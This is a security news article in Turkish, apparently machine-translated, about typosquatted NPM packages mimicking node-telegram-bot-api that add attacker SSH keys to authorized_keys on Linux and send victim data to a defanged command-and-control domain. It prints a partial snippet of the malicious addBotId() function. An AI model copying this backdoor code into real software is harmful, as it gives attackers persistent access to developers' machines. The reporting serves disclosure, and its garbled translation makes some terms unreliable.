Telegram’ın bot ekosistemiyle çalışan Linux geliştiricilerini hedefleyen yeni tedarik zinciri saldırısı ile ilgili bir ortaya çıktı.
2025’in başlarında keşfedilen birkaç kötü niyetli NPM paketi, SSH arka kapılarını sunmak ve şüpheli geliştiricilerden duyarlı verileri dışarı atmak için meşru telgraf bot kütüphaneleri olarak maskeleniyor.
Bu yazım hatası paketler toplu olarak birkaç ay boyunca yaklaşık 300 indirme biriktirerek nispeten mütevazı kurulum numaralarına rağmen önemli bir güvenlik tehdidi oluşturdu.
.png
)
Saldırı, 4.17 milyondan fazla indirme içeren yaygın olarak kullanılan düğüm-telegram-bot-api kütüphanesini hedefliyor.
Kötü niyetli varyantlar-node-telegram-utils, düğüm-telegram-bots-api ve düğüm-telegram-util-meşru paketle neredeyse aynı şekilde ortaya çıkıyor, belgelerini, işlevselliğini kopyalıyor ve hatta otantik Github deposunu güvenilirliği ve aldatıcı geliştiricileri geliştirmek için 19.000’den fazla yıldızı ile ilişkilendiriyor.
Socket.DEV araştırmacıları, bu paketlerin, orijinal projenin itibarından güven ödünç almak için ana sayfalarını meşru Github deposuna geri bağladıkları sofistike bir “Starjacking” tekniği uyguladıklarını belirlediler.
Bu aldatma, kötü niyetli paketleri, meşru kütüphaneyle aynı yıldız sayısını gösterdikleri için gündelik muayene sırasında tanımlanmasını özellikle zorlaştırır.
Bir Linux ortamında kurulum üzerine, kötü amaçlı paketler otomatik olarak gizli bir işlevi yürütür addBotId() Ne zaman yapıcı çağrılır.
Bu işlev bir platform kontrolü gerçekleştirir ve Linux algılanırsa, herhangi bir kullanıcı etkileşimi gerektirmeden kötü amaçlı yükü ile ilerler.
Saldırı, özellikle proje kurulumu veya bakım sırasında NPM paketlerinin sıklıkla kurulduğu geliştirici ortamlarını hedefler.
Enfeksiyon mekanizması ve kalıcılık
Kötü amaçlı yazılımın temel özelliği SSH arka kapı uygulamasında yatmaktadır.
Linux sistemlerinde yürütüldüğünde, kötü amaçlı kod, ~/.ssh/jsersiled_keys dosyasını, saldırgan kontrollü SSH tuşlarını ekleyerek paketin kaldırılmasını sağlayan kalıcı bir erişim kanalı oluşturarak değiştirir:-
async function addBotId() {
const username = os.userInfo().username;
const publicKey = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0eFAxoea78gXpURdj7ufXx1LVEOoVKawxRnwAghXH`;
if (os.platform() === 'linux') {
try {
const ipAddress = await getBotId();
const sshDir = path.join(os.homedir(), '.ssh');
const authorizedKeysPath = path.join(sshDir, 'authorized_keys');
// Code continues to add SSH keys and exfiltrate dataKötü niyetli kod, saldırganların yetkisiz erişim elde etmesini sağlar.
Kod, yalnızca gereksiz erişim için birden fazla SSH tuşunu enjekte etmekle kalmaz, aynı zamanda kurbanın IP adresini ve kullanıcı adını Solana’daki bir komut ve kontrol sunucusuna da aktarır[.]doğrulayıcı[.]Blog, saldırganların daha fazla sömürü veya veri hırsızlığı için envanteri tehlikeye atılmış sistemlere izin veriyor.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy